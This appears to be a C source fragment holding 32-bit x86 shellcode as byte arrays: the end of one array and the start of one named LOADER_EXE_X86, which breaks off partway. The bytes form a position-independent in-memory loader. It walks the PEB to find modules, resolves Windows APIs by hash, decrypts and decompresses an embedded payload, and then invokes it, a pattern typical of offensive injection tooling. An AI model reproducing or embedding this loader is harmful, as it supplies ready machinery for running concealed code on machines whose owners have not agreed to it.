669 0xff, 0x97, 0xe0, 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x10, 0x00, 0xff,
670 0x76, 0x04, 0x57, 0xe8, 0xab, 0xef, 0xff, 0xff, 0x59, 0x59, 0x85, 0xc0,
671 0x74, 0x14, 0x33, 0xc0, 0x40, 0x50, 0x56, 0x8d, 0x44, 0x24, 0x28, 0x50,
672 0xff, 0x97, 0xcc, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x44,
673 0x24, 0x10, 0x83, 0xc6, 0x04, 0x40, 0x89, 0x44, 0x24, 0x10, 0x3b, 0xc3,
674 0x72, 0xcd, 0xeb, 0x20, 0x33, 0xc0, 0x40, 0x50, 0x55, 0x8d, 0x44, 0x24,
675 0x28, 0x50, 0xff, 0x97, 0xd0, 0x00, 0x00, 0x00, 0x6a, 0x08, 0x8d, 0x44,
676 0x24, 0x24, 0x50, 0x56, 0xe8, 0xdd, 0x05, 0x00, 0x00, 0x83, 0xc4, 0x0c,
677 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x40, 0x0c, 0x8b, 0x58, 0x0c, 0x83, 0x7b,
678 0x18, 0x00, 0x0f, 0x84, 0x14, 0x01, 0x00, 0x00, 0x8d, 0x87, 0x6c, 0x03,
679 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x44, 0x24, 0x14, 0x8a, 0x11, 0x33, 0xc0,
680 0x40, 0x33, 0xf6, 0x89, 0x44, 0x24, 0x18, 0x33, 0xc0, 0x84, 0xd2, 0x0f,
681 0x84, 0xe1, 0x00, 0x00, 0x00, 0x8d, 0x7c, 0x24, 0x2c, 0x8b, 0xe9, 0x2b,
682 0xf9, 0x89, 0x7c, 0x24, 0x10, 0x8b, 0x7c, 0x24, 0x18, 0x8b, 0x4c, 0x24,
683 0x10, 0x89, 0x7c, 0x24, 0x10, 0x80, 0xfa, 0x3b, 0x74, 0x29, 0x3d, 0x80,
684 0x00, 0x00, 0x00, 0x73, 0x22, 0x33, 0xff, 0x88, 0x14, 0x29, 0x80, 0xfa,
685 0x77, 0x0f, 0x45, 0x7c, 0x24, 0x10, 0x80, 0xfa, 0x70, 0x89, 0x7c, 0x24,
686 0x18, 0x0f, 0x44, 0x74, 0x24, 0x28, 0x40, 0x45, 0x8a, 0x55, 0x00, 0x84,
687 0xd2, 0x75, 0xce, 0x8b, 0xbc, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x6c,
688 0x24, 0x1c, 0x8b, 0x4c, 0x24, 0x14, 0x89, 0x74, 0x24, 0x10, 0x85, 0xc0,
689 0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, 0x41, 0xc6, 0x44, 0x04, 0x2c, 0x00,
690 0x03, 0xc8, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0xff, 0x73, 0x18, 0x89, 0x4c,
691 0x24, 0x1c, 0xff, 0x57, 0x34, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0xf0, 0x85,
692 0xf6, 0x0f, 0x84, 0x65, 0xff, 0xff, 0xff, 0x83, 0x7c, 0x24, 0x18, 0x00,
693 0x74, 0x26, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x04, 0xff, 0xd6, 0x8b,
694 0xf0, 0x8b, 0x4c, 0x24, 0x14, 0x85, 0xf6, 0x0f, 0x84, 0x47, 0xff, 0xff,
695 0xff, 0x83, 0x3e, 0x00, 0x0f, 0x84, 0x3e, 0xff, 0xff, 0xff, 0x8b, 0x44,
696 0x24, 0x24, 0xeb, 0x23, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x04, 0xff,
697 0xd6, 0x8b, 0xf0, 0x8b, 0x4c, 0x24, 0x14, 0x85, 0xf6, 0x0f, 0x84, 0x21,
698 0xff, 0xff, 0xff, 0x83, 0x3e, 0x00, 0x0f, 0x84, 0x18, 0xff, 0xff, 0xff,
699 0x8b, 0x45, 0x04, 0x8b, 0x4c, 0x24, 0x14, 0x89, 0x06, 0xe9, 0x0a, 0xff,
700 0xff, 0xff, 0x8b, 0x1b, 0x8d, 0x87, 0x6c, 0x03, 0x00, 0x00, 0x83, 0x7b,
701 0x18, 0x00, 0x0f, 0x85, 0xf2, 0xfe, 0xff, 0xff, 0x33, 0xc0, 0x40, 0xe9,
702 0x34, 0xfe, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00,
703 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b,
704 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24,
705 0x08, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x68, 0x00, 0x01, 0x00, 0x00, 0xff,
706 0x74, 0x24, 0x10, 0x6a, 0xff, 0xff, 0x74, 0x24, 0x14, 0x6a, 0x00, 0x6a,
707 0x00, 0xff, 0x50, 0x50, 0xc3, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x58, 0x83,
708 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00,
709 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x30, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c,
710 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14,
711 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x25,
712 0xe7, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46,
713 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x83, 0xec,
714 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24,
715 0x28, 0x56, 0x57, 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89,
716 0x74, 0x24, 0x10, 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9,
717 0x74, 0x11, 0x83, 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47,
718 0x40, 0x89, 0x44, 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7,
719 0x8d, 0x74, 0x24, 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xf7,
720 0x03, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c,
721 0x72, 0x21, 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00,
722 0x00, 0x00, 0x6a, 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24,
723 0x6a, 0x00, 0x50, 0xe8, 0xce, 0x03, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b,
724 0x44, 0x24, 0x2c, 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a,
725 0x10, 0x89, 0x44, 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff,
726 0x10, 0x75, 0x15, 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21,
727 0x00, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff,
728 0x8b, 0x44, 0x24, 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff,
729 0x5f, 0x5e, 0x8b, 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3,
730 0x83, 0xec, 0x10, 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53,
731 0x55, 0x56, 0x8b, 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24,
732 0x10, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24,
733 0x1c, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24,
734 0x28, 0x8b, 0xce, 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2,
735 0xc1, 0xce, 0x08, 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3,
736 0xc1, 0xc7, 0x03, 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b,
737 0xe9, 0x43, 0x83, 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83,
738 0xc4, 0x10, 0xc3, 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b,
739 0x5c, 0x24, 0x24, 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b,
740 0x44, 0x24, 0x20, 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b,
741 0xe8, 0x57, 0x89, 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0,
742 0x8d, 0x7c, 0x24, 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74,
743 0x24, 0x28, 0x8b, 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9,
744 0x04, 0x72, 0xf3, 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b,
745 0x7c, 0x24, 0x18, 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10,
746 0x00, 0x00, 0x00, 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9,
747 0xc1, 0xc6, 0x08, 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce,
748 0xc1, 0xc7, 0x07, 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0,
749 0x10, 0x83, 0x6c, 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28,
750 0x89, 0x4c, 0x24, 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c,
751 0x24, 0x18, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44,
752 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34,
753 0x8b, 0xca, 0x6a, 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9,
754 0x74, 0x19, 0x8d, 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9,
755 0x8a, 0x04, 0x37, 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b,
756 0x6c, 0x24, 0x34, 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80,
757 0x01, 0x01, 0x75, 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3,
758 0x8b, 0x44, 0x24, 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff,
759 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x14, 0x8b,
760 0x4c, 0x24, 0x18, 0x83, 0x64, 0x24, 0x10, 0x00, 0x53, 0x55, 0x8b, 0x6c,
761 0x24, 0x24, 0x8a, 0x01, 0x56, 0x57, 0x88, 0x45, 0x00, 0x83, 0xcf, 0xff,
762 0x8d, 0x45, 0x01, 0x33, 0xf6, 0x89, 0x44, 0x24, 0x18, 0x33, 0xdb, 0x8d,
763 0x41, 0x01, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44,
764 0x24, 0x14, 0x50, 0xe8, 0x67, 0x01, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x0f,
765 0x84, 0x32, 0x01, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xe8, 0x54,
766 0x01, 0x00, 0x00, 0x85, 0xc0, 0x8d, 0x44, 0x24, 0x18, 0x59, 0x50, 0x74,
767 0x7d, 0xe8, 0x45, 0x01, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x74, 0x37, 0x6a,
768 0x04, 0x33, 0xf6, 0x5b, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xe8, 0x31, 0x01,
769 0x00, 0x00, 0x59, 0x8d, 0x34, 0x70, 0x83, 0xeb, 0x01, 0x75, 0xed, 0x8b,
770 0x54, 0x24, 0x18, 0x85, 0xf6, 0x74, 0x0a, 0x8b, 0xc2, 0x2b, 0xc6, 0x8a,
771 0x00, 0x88, 0x02, 0xeb, 0x03, 0xc6, 0x02, 0x00, 0x8b, 0x5c, 0x24, 0x10,
772 0x42, 0xe9, 0xef, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x54,
773 0x24, 0x18, 0x0f, 0xb6, 0x38, 0x40, 0x8b, 0xcf, 0x89, 0x44, 0x24, 0x14,
774 0x83, 0xe1, 0x01, 0x83, 0xc1, 0x02, 0xd1, 0xef, 0x74, 0x14, 0x8b, 0xf2,
775 0x2b, 0xf7, 0x8a, 0x06, 0x88, 0x02, 0x42, 0x46, 0x83, 0xe9, 0x01, 0x75,
776 0xf5, 0xe9, 0xa4, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x43, 0x89, 0x5c, 0x24,
777 0x10, 0xe9, 0x9c, 0x00, 0x00, 0x00, 0xe8, 0xfc, 0x00, 0x00, 0x00, 0x8b,
778 0xd0, 0x59, 0x85, 0xf6, 0x75, 0x2b, 0x83, 0xfa, 0x02, 0x75, 0x26, 0x8d,
779 0x44, 0x24, 0x14, 0x50, 0xe8, 0xe6, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24,
780 0x1c, 0x8b, 0xf0, 0x59, 0x85, 0xf6, 0x74, 0x76, 0x8b, 0xca, 0x2b, 0xcf,
781 0x8a, 0x01, 0x88, 0x02, 0x42, 0x41, 0x83, 0xee, 0x01, 0x75, 0xf5, 0xeb,
782 0x61, 0x8b, 0x4c, 0x24, 0x14, 0x8d, 0x44, 0x24, 0x14, 0x83, 0xf6, 0x01,
783 0x2b, 0xd6, 0xc1, 0xe2, 0x08, 0x0f, 0xb6, 0x39, 0x81, 0xc7, 0x00, 0xfe,
784 0xff, 0xff, 0x03, 0xfa, 0x41, 0x50, 0x89, 0x4c, 0x24, 0x18, 0xe8, 0xa4,
785 0x00, 0x00, 0x00, 0x59, 0x8b, 0xc8, 0x81, 0xff, 0x00, 0x7d, 0x00, 0x00,
786 0x72, 0x01, 0x41, 0x8b, 0x54, 0x24, 0x18, 0x8d, 0x41, 0x01, 0x81, 0xff,
787 0x00, 0x05, 0x00, 0x00, 0x0f, 0x42, 0xc1, 0x81, 0xff, 0x80, 0x00, 0x00,
788 0x00, 0x8d, 0x70, 0x02, 0x0f, 0x43, 0xf0, 0x85, 0xf6, 0x74, 0x13, 0x8b,
789 0xca, 0x2b, 0xcf, 0x8a, 0x01, 0x88, 0x02, 0x42, 0x41, 0x83, 0xee, 0x01,
790 0x75, 0xf5, 0x89, 0x54, 0x24, 0x18, 0x33, 0xf6, 0x46, 0xeb, 0x18, 0x8b,
791 0x4c, 0x24, 0x14, 0x8b, 0x54, 0x24, 0x18, 0x8a, 0x01, 0x88, 0x02, 0x42,
792 0x41, 0x89, 0x4c, 0x24, 0x14, 0x33, 0xf6, 0x89, 0x54, 0x24, 0x18, 0x85,
793 0xdb, 0x0f, 0x84, 0x9b, 0xfe, 0xff, 0xff, 0x5f, 0x5e, 0x2b, 0xd5, 0x5d,
794 0x8b, 0xc2, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x04, 0x8b,
795 0x4a, 0x0c, 0x8d, 0x41, 0xff, 0x89, 0x42, 0x0c, 0x85, 0xc9, 0x75, 0x13,
796 0x8b, 0x02, 0x8a, 0x08, 0x40, 0x89, 0x02, 0xc7, 0x42, 0x0c, 0x07, 0x00,
797 0x00, 0x00, 0x0f, 0xb6, 0xc1, 0xeb, 0x03, 0x8b, 0x42, 0x08, 0x8d, 0x0c,
798 0x00, 0xc1, 0xe8, 0x07, 0x89, 0x4a, 0x08, 0x83, 0xe0, 0x01, 0xc3, 0x56,
799 0x33, 0xf6, 0x46, 0xff, 0x74, 0x24, 0x08, 0xe8, 0xbf, 0xff, 0xff, 0xff,
800 0xff, 0x74, 0x24, 0x0c, 0x8d, 0x34, 0x70, 0xe8, 0xb3, 0xff, 0xff, 0xff,
801 0x59, 0x59, 0x85, 0xc0, 0x75, 0xe5, 0x8b, 0xc6, 0x5e, 0xc3, 0x8b, 0x54,
802 0x24, 0x0c, 0x8b, 0x44, 0x24, 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74,
803 0x13, 0x57, 0x8b, 0x7c, 0x24, 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88,
804 0x0e, 0x46, 0x83, 0xea, 0x01, 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44,
805 0x24, 0x08, 0x8b, 0x4c, 0x24, 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3,
806 0xaa, 0x8b, 0x44, 0x24, 0x08, 0x5f, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x8b,
807 0x4c, 0x24, 0x08, 0x53, 0x8a, 0x10, 0x84, 0xd2, 0x74, 0x0e, 0x8a, 0x19,
808 0x84, 0xdb, 0x74, 0x08, 0x3a, 0xd3, 0x75, 0x04, 0x40, 0x41, 0xeb, 0xec,
809 0x0f, 0xbe, 0x00, 0x0f, 0xbe, 0x09, 0x2b, 0xc1, 0x5b, 0xc3};
810
0
1 unsigned char LOADER_EXE_X86[] = {
2 0x81, 0xec, 0xcc, 0x02, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24,
3 0xdc, 0x02, 0x00, 0x00, 0x33, 0xdb, 0x57, 0x8b, 0xfb, 0x8b, 0x86, 0x38,
4 0x02, 0x00, 0x00, 0x0b, 0x86, 0x3c, 0x02, 0x00, 0x00, 0x0f, 0x84, 0xd4,
5 0x00, 0x00, 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x8c,
6 0x00, 0x00, 0x00, 0xff, 0xb6, 0x88, 0x00, 0x00, 0x00, 0x56, 0xe8, 0xb8,
7 0x20, 0x00, 0x00, 0x8b, 0xf8, 0x83, 0xc4, 0x14, 0x85, 0xff, 0x0f, 0x84,
8 0xaa, 0x00, 0x00, 0x00, 0x53, 0x53, 0x56, 0xe8, 0x99, 0x20, 0x00, 0x00,
9 0x8b, 0xc8, 0xb8, 0x12, 0x21, 0x40, 0x00, 0x2d, 0xed, 0x30, 0x40, 0x00,
10 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff, 0xd7, 0xff, 0x76, 0x2c, 0x8b, 0xf8,
11 0xff, 0x76, 0x28, 0xff, 0xb6, 0xac, 0x01, 0x00, 0x00, 0xff, 0xb6, 0xa8,
12 0x01, 0x00, 0x00, 0x56, 0xe8, 0x76, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c,
13 0x8b, 0xe8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x94, 0x00, 0x00, 0x00, 0xff,
14 0xb6, 0x90, 0x00, 0x00, 0x00, 0x56, 0xe8, 0x5c, 0x20, 0x00, 0x00, 0xff,
15 0x76, 0x2c, 0x8b, 0xd8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x9c, 0x00, 0x00,
16 0x00, 0xff, 0xb6, 0x98, 0x00, 0x00, 0x00, 0x56, 0xe8, 0x42, 0x20, 0x00,
17 0x00, 0x83, 0xc4, 0x3c, 0x85, 0xed, 0x74, 0x46, 0x85, 0xdb, 0x74, 0x42,
18 0x85, 0xc0, 0x74, 0x3e, 0x8d, 0x4c, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x10,
19 0x07, 0x00, 0x01, 0x00, 0x51, 0xff, 0xd0, 0x50, 0xff, 0xd3, 0x8b, 0x86,
20 0x38, 0x02, 0x00, 0x00, 0x83, 0xa4, 0x24, 0xd4, 0x00, 0x00, 0x00, 0xfc,
21 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x10, 0x6a,
22 0x00, 0x50, 0xff, 0xd5, 0xeb, 0x0c, 0x83, 0xc8, 0xff, 0xeb, 0x09, 0x56,
23 0xe8, 0x11, 0x10, 0x00, 0x00, 0x59, 0x8b, 0xc7, 0x5f, 0x5e, 0x5d, 0x5b,
24 0x81, 0xc4, 0xcc, 0x02, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83,
25 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01,
26 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0xc0, 0x1f, 0x00,
27 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x9d, 0x11, 0x40, 0x00, 0xbf, 0xed,
28 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8,
29 0xa5, 0x1f, 0x00, 0x00, 0xb9, 0x0f, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
30 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x92, 0x1f, 0x00, 0x00, 0xb9,
31 0xfc, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
32 0x08, 0xe8, 0x7f, 0x1f, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b,
33 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0x6c, 0x1f, 0x00,
34 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
35 0x5f, 0x89, 0x48, 0x10, 0x8b, 0x44, 0x24, 0x08, 0x83, 0x66, 0x04, 0x00,
36 0x89, 0x46, 0x08, 0x5e, 0xc3, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75,
37 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24,
38 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x08,
39 0x8b, 0x84, 0x97, 0xf4, 0x05, 0x00, 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08,
40 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84,
41 0x97, 0xb4, 0x06, 0x00, 0x00, 0x3b, 0x04, 0x93, 0x75, 0x10, 0x42, 0x83,
42 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31, 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0,
43 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e,
44 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c, 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0,
45 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2, 0x04, 0x00, 0x33, 0xc0, 0xc2, 0x08,
46 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10, 0x02, 0x56, 0x8b, 0x75, 0x08,
47 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85, 0xff, 0x74, 0x1b, 0x8b, 0x46,
48 0x1c, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04, 0x8b, 0x46, 0x1c, 0x89, 0x07,
49 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b, 0x7d, 0x14, 0x85, 0xff, 0x75,
50 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0d, 0x83, 0xc6, 0x14, 0x56,
51 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37, 0x33, 0xc0, 0x5f, 0x5e, 0x5d,
52 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x8b, 0x40, 0x2c, 0xff, 0x50,
53 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01, 0x33, 0xc0, 0xc2, 0x08, 0x00,
54 0x56, 0x57, 0xe8, 0x76, 0x1e, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9,
55 0xae, 0x13, 0x40, 0x00, 0xbf, 0xed, 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03,
56 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0x5b, 0x1e, 0x00, 0x00, 0xb9, 0x0f,
57 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04,
58 0xe8, 0x48, 0x1e, 0x00, 0x00, 0xb9, 0xfc, 0x11, 0x40, 0x00, 0x2b, 0xcf,
59 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08, 0xe8, 0x35, 0x1e, 0x00, 0x00,
60 0xb9, 0x5b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
61 0x48, 0x0c, 0xe8, 0x22, 0x1e, 0x00, 0x00, 0xb9, 0x11, 0x12, 0x40, 0x00,
62 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x10, 0xe8, 0x0f, 0x1e,
63 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
64 0x06, 0x89, 0x48, 0x14, 0xe8, 0xfc, 0x1d, 0x00, 0x00, 0xb9, 0xa9, 0x13,
65 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8,
66 0xe9, 0x1d, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
67 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8, 0xd6, 0x1d, 0x00, 0x00, 0xb9,
68 0x5e, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
69 0x20, 0xe8, 0xc3, 0x1d, 0x00, 0x00, 0xb9, 0x59, 0x13, 0x40, 0x00, 0x2b,
70 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x24, 0xe8, 0xb0, 0x1d, 0x00,
71 0x00, 0xb9, 0x59, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
72 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24, 0x08, 0x83, 0x66, 0x04, 0x00,
73 0x89, 0x46, 0x2c, 0x5e, 0xc3, 0x33, 0xc0, 0xc2, 0x04, 0x00, 0x55, 0x8b,
74 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56, 0x6a, 0x20, 0x50, 0x89, 0x45,
75 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc, 0x8d, 0x45, 0xd4, 0x50, 0xe8,
76 0x02, 0x22, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d, 0x4d, 0xd4, 0x83, 0xc4,
77 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75, 0x12,
78 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d, 0x4d, 0xf8, 0x51, 0x8d, 0x4d,
79 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33, 0xc0, 0x5e, 0xc9, 0xc2, 0x08,
80 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9,
81 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x6c, 0x8b, 0x54, 0x24,
82 0x04, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x56, 0x57, 0x8b, 0x7a, 0x2c, 0x33,
83 0xf6, 0x8b, 0x84, 0xb7, 0xf4, 0x05, 0x00, 0x00, 0x3b, 0x04, 0xb3, 0x75,
84 0x08, 0x46, 0x83, 0xfe, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33, 0xf6, 0x8b,
85 0x84, 0xb7, 0xa4, 0x06, 0x00, 0x00, 0x3b, 0x04, 0xb3, 0x75, 0x0e, 0x46,
